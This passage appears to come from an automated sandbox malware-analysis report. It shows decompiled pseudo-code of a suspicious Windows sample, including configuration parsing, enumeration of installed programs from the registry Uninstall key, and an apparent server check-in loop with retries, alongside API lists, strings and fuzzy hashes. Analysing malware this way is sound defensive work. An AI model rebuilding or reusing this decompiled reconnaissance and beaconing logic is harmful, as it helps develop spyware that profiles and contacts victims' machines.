				_t75 = E0042CE7D(_t61,  &_v75008, __edi,  &_v75008, ";",  &_v125016);
				_t79 = _t77 + 0x48;
				_t62 = 1;
				if(_t75 == 0) {
					L16:
					return E0042A36A(E0042A2F0( &_v75008, 0, 0xc350), _t62, _v8 ^ _t76, _t71, _t72, _t75);
				} else {
					_push(__edi);
					_t73 = _v125016;
					do {
						_t15 = _t62 - 1; // 0x0
						_t56 = _t15;
						if(_t56 > 5) {
							goto L14;
						}
						switch( *((intOrPtr*)(_t56 * 4 +  &M0040D940))) {
							case 0:
								E0042A2F0( &_v10008, 0, 0x1388);
								_t79 = _t79 + 0xc;
								_push(_t75);
								_push( &_v10008);
								 *0x464860();
								goto L14;
							case 1:
								__edx =  &_v5008;
								__eax = E0042A2F0( &_v5008, 0, 0x1388);
								_push(__esi);
								__eax =  &_v5008;
								_push( &_v5008);
								__eax =  *0x464860();
								goto L14;
							case 2:
								__ecx =  &_v125008;
								__eax = E0042A2F0( &_v125008, 0, 0xc350);
								_push(__esi);
								__edx =  &_v125008;
								_push(__edx);
								__eax =  *0x464860();
								goto L14;
							case 3:
								_push(__esi);
								__eax = E0042D020();
								__esp = __esp + 4;
								_v125024 = __eax;
								goto L14;
							case 4:
								_push("true");
								_push(__esi);
								__eax =  *0x464890();
								__eflags = __eax;
								if(__eax != 0) {
									_push("false");
									_push(__esi);
									__eax =  *0x464890();
									__eflags = __eax;
									if(__eax != 0) {
										_push(__esi);
										__edi = 1;
										__eax = E0042D020();
										__esp = __esp + 4;
										_v125012 = __eax;
									} else {
										__edi = 0;
									}
								} else {
									_t25 = __eax + 1; // 0x1
									__edi = _t25;
									_v125012 = 0x3e7;
								}
								goto L14;
							case 5:
								 &_v25008 = E0042A2F0( &_v25008, 0, 0x3a98);
								_push(__esi);
								__ecx =  &_v25008;
								_push( &_v25008);
								__eax =  *0x464860();
								__edx = _v125012;
								_v125020 = _v125024;
								__ecx =  &_v125008;
								__edx =  &_v5008;
								__ecx =  &_v10008;
								__eax = E0040D1C0(__eflags,  &_v10008, _v125024,  &_v5008,  &_v125008, __edi, __esi, _v125020, _v125012); // executed
								__ebx = 0;
								__eflags = 0;
								goto L14;
						}
						L14:
						_t71 =  &_v125016;
						_t62 = _t62 + 1;
						_t75 = E0042CE7D(_t62,  &_v125016, _t73, 0, ";",  &_v125016);
						_t79 = _t79 + 0xc;
					} while (_t75 != 0);
					_pop(_t72);
					goto L16;
				}
			}

0x0040d6e0
0x0040d6e8
0x0040d6ed
0x0040d6f4
0x0040d70d
0x0040d713
0x0040d71d
0x0040d730
0x0040d743
0x0040d756
0x0040d769
0x0040d779
0x0040d786
0x0040d797
0x0040d799
0x0040d79c
0x0040d7a3
0x0040d91a
0x0040d93f
0x0040d7a9
0x0040d7a9
0x0040d7aa
0x0040d7b0
0x0040d7b0
0x0040d7b0
0x0040d7b6
0x00000000
0x00000000
0x0040d7bc
0x00000000
0x0040d7d1
0x0040d7d6
0x0040d7d9
0x0040d7e0
0x0040d7e1
0x00000000
0x00000000
0x0040d7f1
0x0040d7fa
0x0040d802
0x0040d803
0x0040d809
0x0040d80a
0x00000000
0x00000000
0x0040d81a
0x0040d823
0x0040d82b
0x0040d82c
0x0040d832
0x0040d833
0x00000000
0x00000000
0x0040d83e
0x0040d83f
0x0040d844
0x0040d847
0x00000000
0x00000000
0x0040d852
0x0040d857
0x0040d858
0x0040d85e
0x0040d860
0x0040d874
0x0040d879
0x0040d87a
0x0040d880
0x0040d882
0x0040d888
0x0040d889
0x0040d88e
0x0040d893
0x0040d896
0x0040d884
0x0040d884
0x0040d884
0x0040d862
0x0040d862
0x0040d862
0x0040d865
0x0040d865
0x00000000
0x00000000
0x0040d8ac
0x0040d8b4
0x0040d8b5
0x0040d8bb
0x0040d8bc
0x0040d8c2
0x0040d8d0
0x0040d8d8
0x0040d8df
0x0040d8e7
0x0040d8ee
0x0040d8f6
0x0040d8f6
0x00000000
0x00000000
0x0040d8f8
0x0040d8f8
0x0040d906
0x0040d90c
0x0040d90e
0x0040d911
0x0040d919
0x00000000
0x0040d919

APIs

_memset.LIBCMT ref: 0040D71D
_memset.LIBCMT ref: 0040D730
_memset.LIBCMT ref: 0040D743
_memset.LIBCMT ref: 0040D756
_memset.LIBCMT ref: 0040D769
lstrcat.KERNEL32(?,?), ref: 0040D779
_strtok_s.LIBCMT ref: 0040D792
_memset.LIBCMT ref: 0040D7D1
lstrcat.KERNEL32(?,00000000), ref: 0040D7E1
_memset.LIBCMT ref: 0040D7FA
lstrcat.KERNEL32(?,00000000), ref: 0040D80A
_memset.LIBCMT ref: 0040D823
lstrcat.KERNEL32(?,00000000), ref: 0040D833
StrCmpCA.SHLWAPI(00000000,true), ref: 0040D858
_memset.LIBCMT ref: 0040D8AC
lstrcat.KERNEL32(?,00000000), ref: 0040D8BC
_strtok_s.LIBCMT ref: 0040D907
_memset.LIBCMT ref: 0040D928

Strings

false, xrefs: 0040D874
true, xrefs: 0040D852

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memset$lstrcat$_strtok_s
String ID: false$true
API String ID: 657882108-2658103896
Opcode ID: ff16ca33215aeb80221239270afd042035396feb33d3e5d819ed8e2f740c0da4
Instruction ID: 6d4207458d74ab09322279a65a6f85e8b010d1d7abafdd654a2c9ceb70d8740c
Opcode Fuzzy Hash: ff16ca33215aeb80221239270afd042035396feb33d3e5d819ed8e2f740c0da4
Instruction Fuzzy Hash: 15511AB2E40324ABDB24EB90DC41FDE73B8DF54704F0045EAF909B6181EE7957488B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9F0 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 129
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041E9F0(intOrPtr _a4) {
				signed int _v8;
				char _v1032;
				char _v2056;
				char _v3080;
				int _v3084;
				void* _v3088;
				void* _v3092;
				int* _v3096;
				int _v3100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				long _t40;
				long _t43;
				long _t46;
				long _t51;
				long _t55;
				void* _t76;
				long _t77;
				intOrPtr _t78;
				signed int _t79;
				void* _t80;

				_t37 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t37 ^ _t79;
				_t78 = _a4;
				_v3092 = 0;
				_v3088 = 0;
				_v3100 = 0xf003f;
				_v3084 = 0;
				_t40 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v3092); // executed
				if(_t40 == 0) {
					_v3096 = 0;
					_push(_t76);
					do {
						_t72 =  &_v3080;
						_v3084 = 0x400;
						_t43 = RegEnumKeyExA(_v3092, _v3096,  &_v3080,  &_v3084, 0, 0, 0, 0); // executed
						_t77 = _t43;
						if(_t77 != 0) {
							goto L9;
						} else {
							wsprintfA( &_v2056, "%s\\%s", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v3080);
							_t80 = _t80 + 0x10;
							_t46 = RegOpenKeyExA(0x80000002,  &_v2056, 0, 0x20019,  &_v3088); // executed
							if(_t46 != 0) {
								_t72 = _v3088;
								RegCloseKey(_v3088);
								_t40 = RegCloseKey(_v3092);
							} else {
								_t72 =  &_v3100;
								_v3084 = 0x400;
								_t51 = RegQueryValueExA(_v3088, "DisplayName", 0,  &_v3100,  &_v1032,  &_v3084); // executed
								if(_t51 == 0) {
									 *0x464860(_t78,  &_v1032);
									_t72 = _v3088;
									_v3084 = 0x400;
									_t55 = RegQueryValueExA(_v3088, "DisplayVersion", 0,  &_v3100,  &_v1032,  &_v3084); // executed
									if(_t55 == 0) {
										 *0x464860(_t78, " [");
										 *0x464860(_t78,  &_v1032);
										 *0x464860(_t78, "]");
									}
									 *0x464860(_t78, "\n");
								}
								RegCloseKey(_v3088);
								goto L9;
							}
						}
						L11:
						_pop(_t76);
						goto L12;
						L9:
						_v3096 = _v3096 + 1;
					} while (_t77 == 0);
					_t40 = RegCloseKey(_v3092);
					goto L11;
				}
				L12:
				return E0042A36A(_t40, 0, _v8 ^ _t79, _t72, _t76, _t78);
			}

0x0041e9f9
0x0041ea00
0x0041ea05
0x0041ea21
0x0041ea27
0x0041ea2d
0x0041ea37
0x0041ea3d
0x0041ea45
0x0041ea4b
0x0041ea51
0x0041ea52
0x0041ea69
0x0041ea72
0x0041ea7c
0x0041ea82
0x0041ea86
0x00000000
0x0041ea8c
0x0041eaa4
0x0041eaaa
0x0041eac6
0x0041eace
0x0041ebbb
0x0041ebc2
0x0041eba2
0x0041ead4
0x0041eae8
0x0041eaf6
0x0041eb00
0x0041eb08
0x0041eb12
0x0041eb1f
0x0041eb3a
0x0041eb44
0x0041eb4c
0x0041eb54
0x0041eb62
0x0041eb6e
0x0041eb6e
0x0041eb7a
0x0041eb7a
0x0041eb87
0x00000000
0x0041eb87
0x0041eace
0x0041eba2
0x0041eba8
0x00000000
0x0041eb8d
0x0041eb8d
0x0041eb93
0x0041eba2
0x00000000
0x0041eba2
0x0041eba9
0x0041ebb8

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000010,?), ref: 0041EA3D
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0041EA7C
wsprintfA.USER32 ref: 0041EAA4
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041EAC6
RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,00000400), ref: 0041EB00
lstrcat.KERNEL32(0040D01C,?), ref: 0041EB12
RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,00000400), ref: 0041EB44
lstrcat.KERNEL32(0040D01C,004458A4), ref: 0041EB54
lstrcat.KERNEL32(0040D01C,?), ref: 0041EB62
lstrcat.KERNEL32(0040D01C,004466F0), ref: 0041EB6E
lstrcat.KERNEL32(0040D01C,00443C5C), ref: 0041EB7A
RegCloseKey.ADVAPI32(?), ref: 0041EB87
RegCloseKey.ADVAPI32(?), ref: 0041EBA2
RegCloseKey.ADVAPI32(?), ref: 0041EBC2

Strings

%s\%s, xrefs: 0041EA9E
DisplayVersion, xrefs: 0041EB34
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041EA17, 0041EA93
?, xrefs: 0041EA2D
DisplayName, xrefs: 0041EAF0

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Close$OpenQueryValue$Enumwsprintf
String ID: %s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 3722822016-3437733507
Opcode ID: 0961f31601975953144a7edfeabc493b68a23e146f24bf050af2d91aaafede33
Instruction ID: 5bbed86613de6b484c90ecdcc1b1b9771c588c9ce412f526e44ab919e5c86da1
Opcode Fuzzy Hash: 0961f31601975953144a7edfeabc493b68a23e146f24bf050af2d91aaafede33
Instruction Fuzzy Hash: 1F415EB550012CEFEB10DF55DD84EEAB3BCEB86705F00469AE609A2101EFB45E85CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF60 Relevance: 32.0, APIs: 16, Strings: 2, Instructions: 514
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E0040EF60() {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v280;
				intOrPtr _v288;
				char _v308;
				intOrPtr _v316;
				void* _v336;
				char _v337;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t158;
				signed int _t159;
				intOrPtr* _t170;
				void* _t173;
				void* _t175;
				void* _t176;
				intOrPtr* _t180;
				void* _t182;
				void* _t184;
				intOrPtr* _t187;
				void* _t189;
				void* _t192;
				intOrPtr* _t194;
				void* _t195;
				void* _t197;
				void* _t203;
				intOrPtr* _t207;
				intOrPtr* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t219;
				intOrPtr* _t223;
				intOrPtr* _t225;
				void* _t227;
				void* _t230;
				intOrPtr* _t232;
				void* _t235;
				intOrPtr* _t238;
				void* _t240;
				void* _t242;
				void* _t260;
				signed int _t261;
				void* _t262;
				char* _t322;
				char* _t327;
				signed int _t332;
				signed int _t333;
				void* _t334;
				void* _t335;
				char* _t336;
				void* _t337;
				char* _t338;
				char* _t339;
				signed int _t340;
				void* _t341;
				void* _t343;
				intOrPtr _t344;
				char* _t345;
				char* _t347;
				void* _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t352;
				char* _t353;
				char* _t354;
				char* _t355;
				char* _t357;
				intOrPtr _t358;
				char* _t359;
				char* _t361;
				void* _t363;
				void* _t365;
				void* _t367;
				void* _t369;
				void* _t372;
				void* _t374;
				void* _t377;
				void* _t379;
				void* _t381;
				void* _t383;

				_t158 =  *0x451f00; // 0xc21d6f0a
				_t159 = _t158 ^ _t340;
				_v20 = _t159;
				 *[fs:0x0] =  &_v16;
				E0042A2F0( &_v280, 0, 0x104);
				_t343 = _t341 - 0x150 + 0xc;
				 *0x464860( &_v280, "/", _t159, _t332, _t335, _t260,  *[fs:0x0], E0043E694, 0xffffffff);
				_t333 = _t332 | 0xffffffff;
				_t261 = _t333 + 0x11;
				while(1) {
					_t344 = _t343 - 0x1c;
					_v352 = _t344;
					E0040AA30( &_v337, _t344);
					_t345 = _t344 - 0x1c;
					_t336 = _t345;
					_v348 = _t345;
					 *((intOrPtr*)(_t336 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t336 + 0x10)) = 0;
					_v8 = 0;
					 *_t336 = 0;
					E00404BC0(_t336,  &_v280, E0042BC70( &_v280));
					_t347 = _t345 + 4 - 0x1c;
					_t329 = _t347;
					_v344 = _t347;
					_v8 = 1;
					E0040A870( &_v337, _t347);
					_v8 = _t333;
					E0040E910();
					_t170 =  *0x451844; // 0x25ca500
					_t348 = _t347 + 0x54;
					_t363 =  *0x451858 - _t261; // 0xf
					if(_t363 < 0) {
						_t170 = 0x451844;
					}
					_push("ERROR");
					_push(_t170);
					if( *0x464890() != 0) {
						break;
					}
					_t180 =  *0x451844; // 0x25ca500
					_t365 =  *0x451858 - _t261; // 0xf
					if(_t365 < 0) {
						_t180 = 0x451844;
					}
					_push("ERROR");
					_push(_t180);
					if( *0x464890() != 0) {
						_t329 =  &_v308;
						_t182 = E0040AA30( &_v337,  &_v308);
						_v8 = 0x1a;
						E00404D00(0x451860, _t182);
						_v8 = _t333;
						__eflags = _v288 - _t261;
						if(_v288 >= _t261) {
							_push(_v308);
							E0042A289();
							_t348 = _t348 + 4;
						}
						_t184 = E0040AA30( &_v337,  &_v308);
						_v8 = 0x1b;
						_t176 = E00404D00(0x45187c, _t184);
						__eflags = _v288 - _t261;
						if(_v288 >= _t261) {
							_t329 = _v308;
							_push(_v308);
							goto L69;
						}
					} else {
						_t187 =  *0x451844; // 0x25ca500
						_t367 =  *0x451858 - _t261; // 0xf
						if(_t367 < 0) {
							_t187 = 0x451844;
						}
						_push("ERROR");
						_push(_t187);
						if( *0x464890() != 0) {
							_t189 = E0040AA30( &_v337,  &_v308);
							_v8 = 0x24;
							E00404D00(0x451860, _t189);
							_v8 = _t333;
							__eflags = _v288 - _t261;
							if(_v288 >= _t261) {
								_t329 = _v308;
								_push(_v308);
								E0042A289();
								_t348 = _t348 + 4;
							}
							_t192 = E0040AA30( &_v337,  &_v308);
							_v8 = 0x25;
							_t176 = E00404D00(0x45187c, _t192);
							__eflags = _v288 - _t261;
							if(_v288 >= _t261) {
								_push(_v308);
								goto L69;
							}
						} else {
							_t194 =  *0x451844; // 0x25ca500
							_t369 =  *0x451858 - _t261; // 0xf
							if(_t369 < 0) {
								_t194 = 0x451844;
							}
							_t195 =  *0x464890(_t194, "ERROR");
							_t370 = _t195;
							if(_t195 != 0) {
								_t197 = E0040AA30( &_v337,  &_v308);
								_v8 = 0x2e;
								E00404D00(0x451860, _t197);
								_v8 = _t333;
								__eflags = _v288 - _t261;
								if(_v288 >= _t261) {
									_push(_v308);
									E0042A289();
									_t348 = _t348 + 4;
								}
								_t329 =  &_v308;
								_t175 = E0040AA30( &_v337,  &_v308);
								_v8 = 0x2f;
								goto L67;
							} else {
								_push("|");
								_t350 = _t348 - 0x1c;
								_v344 = _t350;
								E0040A8F0( &_v337, _t350);
								_t351 = _t350 - 0x1c;
								_v348 = _t351;
								_v8 = 0x28;
								E0040A9B0( &_v337, _t351);
								_v8 = 0x29;
								_t203 = E0040A9B0( &_v337,  &_v308);
								_v8 = 0x2a;
								_push( *((intOrPtr*)(_t203 + 0x10)) + 1);
								_v8 = 0x2b;
								E0040E720(_t370); // executed
								_t348 = _t351 + 0x40;
								_v8 = _t333;
								if(_v288 >= _t261) {
									_push(_v308);
									E0042A289();
									_t348 = _t348 + 4;
								}
								_t207 =  *0x451844; // 0x25ca500
								_t372 =  *0x451858 - _t261; // 0xf
								if(_t372 < 0) {
									_t207 = 0x451844;
								}
								_push("ERROR");
								_push(_t207);
								if( *0x464890() != 0) {
									_t358 = _t348 - 0x1c;
									_v344 = _t358;
									E0040A930( &_v337, _t358);
									_t359 = _t358 - 0x1c;
									_t339 = _t359;
									_v348 = _t359;
									 *((intOrPtr*)(_t339 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t339 + 0x10)) = 0;
									_v8 = 0x2c;
									 *_t339 = 0;
									E00404BC0(_t339,  &_v280, E0042BC70( &_v280));
									_t361 = _t359 + 4 - 0x1c;
									_t327 = _t361;
									_v352 = _t361;
									 *((intOrPtr*)(_t327 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t327 + 0x10)) = 0;
									_v8 = 0x2d;
									 *_t327 = 0;
									E00404AD0(_t327, 0x451844, 0, _t333);
									_v8 = _t333;
									E0040E910(); // executed
									_t348 = _t361 + 0x54;
								}
								_t209 =  *0x451844; // 0x25ca500
								_t374 =  *0x451858 - _t261; // 0xf
								if(_t374 < 0) {
									_t209 = 0x451844;
								}
								_t210 =  *0x464890(_t209, "ERROR");
								_t375 = _t210;
								if(_t210 != 0) {
									_t329 =  &_v308;
									_t211 = E0040A9F0( &_v337,  &_v308);
									_v8 = 0x38;
									E00404D00(0x451860, _t211);
									_v8 = _t333;
									__eflags = _v288 - _t261;
									if(_v288 >= _t261) {
										_push(_v308);
										E0042A289();
										_t348 = _t348 + 4;
									}
									_t213 = E0040A930( &_v337,  &_v308);
									_v8 = 0x39;
									_t176 = E00404D00(0x45187c, _t213);
									__eflags = _v288 - _t261;
									if(_v288 >= _t261) {
										_t329 = _v308;
										_push(_v308);
										goto L69;
									}
								} else {
									_push("|");
									_t352 = _t348 - 0x1c;
									_v344 = _t352;
									E0040A970( &_v337, _t352);
									_t353 = _t352 - 0x1c;
									_t329 = _t353;
									_v348 = _t353;
									_v8 = 0x32;
									E0040A9B0( &_v337, _t353);
									_v8 = 0x33;
									_t219 = E0040A9B0( &_v337,  &_v308);
									_v8 = 0x34;
									_push( *((intOrPtr*)(_t219 + 0x10)) + 1);
									_v8 = 0x35;
									E0040E720(_t375);
									_t348 = _t353 + 0x40;
									_v8 = _t333;
									if(_v288 >= _t261) {
										_push(_v308);
										E0042A289();
										_t348 = _t348 + 4;
									}
									_t223 =  *0x451844; // 0x25ca500
									_t377 =  *0x451858 - _t261; // 0xf
									if(_t377 < 0) {
										_t223 = 0x451844;
									}
									_push("ERROR");
									_push(_t223);
									if( *0x464890() != 0) {
										_t354 = _t348 - 0x1c;
										_t329 = _t354;
										_v344 = _t354;
										E0040A930( &_v337, _t354);
										_t355 = _t354 - 0x1c;
										_t338 = _t355;
										_v348 = _t355;
										 *((intOrPtr*)(_t338 + 0x14)) = 0xf;
										 *((intOrPtr*)(_t338 + 0x10)) = 0;
										_v8 = 0x36;
										 *_t338 = 0;
										E00404BC0(_t338,  &_v280, E0042BC70( &_v280));
										_t357 = _t355 + 4 - 0x1c;
										_t322 = _t357;
										_v352 = _t357;
										 *((intOrPtr*)(_t322 + 0x14)) = 0xf;
										 *((intOrPtr*)(_t322 + 0x10)) = 0;
										_v8 = 0x37;
										 *_t322 = 0;
										E00404AD0(_t322, 0x451844, 0, _t333);
										_v8 = _t333;
										E0040E910();
										_t348 = _t357 + 0x54;
									}
									_t225 =  *0x451844; // 0x25ca500
									_t379 =  *0x451858 - _t261; // 0xf
									if(_t379 < 0) {
										_t225 = 0x451844;
									}
									_push("ERROR");
									_push(_t225);
									if( *0x464890() != 0) {
										_t227 = E0040A9F0( &_v337,  &_v308);
										_v8 = 0x42;
										E00404D00(0x451860, _t227);
										_v8 = _t333;
										__eflags = _v288 - _t261;
										if(_v288 >= _t261) {
											_t329 = _v308;
											_push(_v308);
											E0042A289();
											_t348 = _t348 + 4;
										}
										_t230 = E0040A930( &_v337,  &_v308);
										_v8 = 0x43;
										_t176 = E00404D00(0x45187c, _t230);
										__eflags = _v288 - _t261;
										if(_v288 >= _t261) {
											_push(_v308);
											goto L69;
										}
									} else {
										_t232 =  *0x451844; // 0x25ca500
										_t381 =  *0x451858 - _t261; // 0xf
										if(_t381 < 0) {
											_t232 = 0x451844;
										}
										_push("ERROR");
										_push(_t232);
										if( *0x464890() != 0) {
											_t235 = E0040AA30( &_v337,  &_v308);
											_v8 = 0x4c;
											E00404D00(0x451860, _t235);
											_v8 = _t333;
											__eflags = _v288 - _t261;
											if(_v288 >= _t261) {
												_push(_v308);
												E0042A289();
												_t348 = _t348 + 4;
											}
											_t329 =  &_v308;
											_t175 = E0040AA30( &_v337,  &_v308);
											_v8 = 0x4d;
											L67:
											_t176 = E00404D00(0x45187c, _t175);
											__eflags = _v288 - _t261;
											if(_v288 >= _t261) {
												_push(_v308);
												goto L69;
											}
										} else {
											_t238 =  *0x451844; // 0x25ca500
											_t383 =  *0x451858 - _t261; // 0xf
											if(_t383 < 0) {
												_t238 = 0x451844;
											}
											_push("ERROR");
											_push(_t238);
											if( *0x464890() != 0) {
												_t329 =  &_v308;
												_t240 = E0040AA30( &_v337,  &_v308);
												_v8 = 0x4e;
												E00404D00(0x451860, _t240);
												_v8 = _t333;
												__eflags = _v288 - _t261;
												if(_v288 >= _t261) {
													_push(_v308);
													E0042A289();
													_t348 = _t348 + 4;
												}
												_t242 = E0040AA30( &_v337,  &_v336);
												_v8 = 0x4f;
												_t176 = E00404D00(0x45187c, _t242);
												__eflags = _v316 - _t261;
												if(_v316 >= _t261) {
													_t329 = _v336;
													_push(_v336);
													L69:
													_t176 = E0042A289();
												}
											} else {
												Sleep(0xea60);
												continue;
											}
										}
									}
								}
							}
						}
					}
					 *[fs:0x0] = _v16;
					_pop(_t334);
					_pop(_t337);
					_pop(_t262);
					__eflags = _v20 ^ _t340;
					return E0042A36A(_t176, _t262, _v20 ^ _t340, _t329, _t334, _t337);
				}
				_t173 = E0040A8B0( &_v337,  &_v308);
				_v8 = _t261;
				E00404D00(0x451860, _t173);
				_v8 = _t333;
				__eflags = _v288 - _t261;
				if(_v288 >= _t261) {
					_push(_v308);
					E0042A289();
					_t348 = _t348 + 4;
				}
				_t329 =  &_v308;
				_t175 = E0040AA30( &_v337,  &_v308);
				_v8 = 0x11;
				goto L67;
			}

0x0040ef77
0x0040ef7c
0x0040ef7e
0x0040ef88
0x0040ef9c
0x0040efa1
0x0040efb0
0x0040efb6
0x0040efb9
0x0040efc0
0x0040efc0
0x0040efc5
0x0040efd2
0x0040efd7
0x0040efda
0x0040efe2
0x0040efe8
0x0040efef
0x0040eff7
0x0040effe
0x0040f013
0x0040f018
0x0040f01b
0x0040f01d
0x0040f02a
0x0040f02e
0x0040f033
0x0040f036
0x0040f03b
0x0040f040
0x0040f043
0x0040f049
0x0040f04b
0x0040f04b
0x0040f050
0x0040f055
0x0040f05e
0x00000000
0x00000000
0x0040f064
0x0040f069
0x0040f06f
0x0040f071
0x0040f071
0x0040f076
0x0040f07b
0x0040f084
0x0040f67e
0x0040f68b
0x0040f696
0x0040f69d
0x0040f6a2
0x0040f6a5
0x0040f6ab
0x0040f6b3
0x0040f6b4
0x0040f6b9
0x0040f6b9
0x0040f6c9
0x0040f6d4
0x0040f6db
0x0040f6e0
0x0040f6e6
0x0040f6e8
0x0040f6ee
0x00000000
0x0040f6ee
0x0040f08a
0x0040f08a
0x0040f08f
0x0040f095
0x0040f097
0x0040f097
0x0040f09c
0x0040f0a1
0x0040f0aa
0x0040f611
0x0040f61c
0x0040f623
0x0040f628
0x0040f62b
0x0040f631
0x0040f633
0x0040f639
0x0040f63a
0x0040f63f
0x0040f63f
0x0040f64f
0x0040f65a
0x0040f661
0x0040f666
0x0040f66c
0x0040f678
0x00000000
0x0040f678
0x0040f0b0
0x0040f0b0
0x0040f0b5
0x0040f0bb
0x0040f0bd
0x0040f0bd
0x0040f0c8
0x0040f0d4
0x0040f0d6
0x0040f5b5
0x0040f5c0
0x0040f5c7
0x0040f5cc
0x0040f5cf
0x0040f5d5
0x0040f5dd
0x0040f5de
0x0040f5e3
0x0040f5e3
0x0040f5e6
0x0040f5f3
0x0040f5f8
0x00000000
0x0040f0dc
0x0040f0dc
0x0040f0e1
0x0040f0e6
0x0040f0ed
0x0040f0f2
0x0040f0f7
0x0040f104
0x0040f10b
0x0040f11d
0x0040f121
0x0040f129
0x0040f12e
0x0040f12f
0x0040f133
0x0040f138
0x0040f13b
0x0040f144
0x0040f14c
0x0040f14d
0x0040f152
0x0040f152
0x0040f155
0x0040f15a
0x0040f160
0x0040f162
0x0040f162
0x0040f167
0x0040f16c
0x0040f175
0x0040f17b
0x0040f180
0x0040f18d
0x0040f192
0x0040f195
0x0040f19d
0x0040f1a3
0x0040f1aa
0x0040f1b2
0x0040f1b9
0x0040f1ce
0x0040f1d3
0x0040f1d6
0x0040f1d8
0x0040f1e1
0x0040f1e8
0x0040f1f4
0x0040f1f8
0x0040f1fb
0x0040f200
0x0040f203
0x0040f208
0x0040f208
0x0040f20b
0x0040f210
0x0040f216
0x0040f218
0x0040f218
0x0040f223
0x0040f229
0x0040f22b
0x0040f534
0x0040f541
0x0040f54c
0x0040f553
0x0040f558
0x0040f55b
0x0040f561
0x0040f569
0x0040f56a
0x0040f56f
0x0040f56f
0x0040f57f
0x0040f58a
0x0040f591
0x0040f596
0x0040f59c
0x0040f5a2
0x0040f5a8
0x00000000
0x0040f5a8
0x0040f231
0x0040f231
0x0040f236
0x0040f23b
0x0040f248
0x0040f24d
0x0040f250
0x0040f252
0x0040f25f
0x0040f266
0x0040f278
0x0040f27c
0x0040f284
0x0040f289
0x0040f28a
0x0040f28e
0x0040f293
0x0040f296
0x0040f29f
0x0040f2a7
0x0040f2a8
0x0040f2ad
0x0040f2ad
0x0040f2b0
0x0040f2b5
0x0040f2bb
0x0040f2bd
0x0040f2bd
0x0040f2c2
0x0040f2c7
0x0040f2d0
0x0040f2d6
0x0040f2d9
0x0040f2db
0x0040f2e8
0x0040f2ed
0x0040f2f0
0x0040f2f8
0x0040f2fe
0x0040f305
0x0040f30d
0x0040f314
0x0040f329
0x0040f32e
0x0040f331
0x0040f333
0x0040f33c
0x0040f343
0x0040f34f
0x0040f353
0x0040f356
0x0040f35b
0x0040f35e
0x0040f363
0x0040f363
0x0040f366
0x0040f36b
0x0040f371
0x0040f373
0x0040f373
0x0040f378
0x0040f37d
0x0040f386
0x0040f4c7
0x0040f4d2
0x0040f4d9
0x0040f4de
0x0040f4e1
0x0040f4e7
0x0040f4e9
0x0040f4ef
0x0040f4f0
0x0040f4f5
0x0040f4f5
0x0040f505
0x0040f510
0x0040f517
0x0040f51c
0x0040f522
0x0040f52e
0x00000000
0x0040f52e
0x0040f38c
0x0040f38c
0x0040f391
0x0040f397
0x0040f399
0x0040f399
0x0040f39e
0x0040f3a3
0x0040f3ac
0x0040f46b
0x0040f476
0x0040f47d
0x0040f482
0x0040f485
0x0040f48b
0x0040f493
0x0040f494
0x0040f499
0x0040f499
0x0040f49c
0x0040f4a9
0x0040f4ae
0x0040f744
0x0040f74a
0x0040f74f
0x0040f755
0x0040f75d
0x00000000
0x0040f75d
0x0040f3b2
0x0040f3b2
0x0040f3b7
0x0040f3bd
0x0040f3bf
0x0040f3bf
0x0040f3c4
0x0040f3c9
0x0040f3d2
0x0040f3e4
0x0040f3f1
0x0040f3fc
0x0040f403
0x0040f408
0x0040f40b
0x0040f411
0x0040f419
0x0040f41a
0x0040f41f
0x0040f41f
0x0040f42f
0x0040f43a
0x0040f441
0x0040f446
0x0040f44c
0x0040f452
0x0040f458
0x0040f75e
0x0040f75e
0x0040f763
0x0040f3d4
0x0040f3d9
0x00000000
0x0040f3d9
0x0040f3d2
0x0040f3ac
0x0040f386
0x0040f22b
0x0040f0d6
0x0040f0aa
0x0040f769
0x0040f771
0x0040f772
0x0040f773
0x0040f777
0x0040f781
0x0040f781
0x0040f6fe
0x0040f709
0x0040f70c
0x0040f711
0x0040f714
0x0040f71a
0x0040f722
0x0040f723
0x0040f728
0x0040f728
0x0040f72b
0x0040f738
0x0040f73d
0x00000000

APIs

_memset.LIBCMT ref: 0040EF9C
lstrcat.KERNEL32(?,0044585C), ref: 0040EFB0

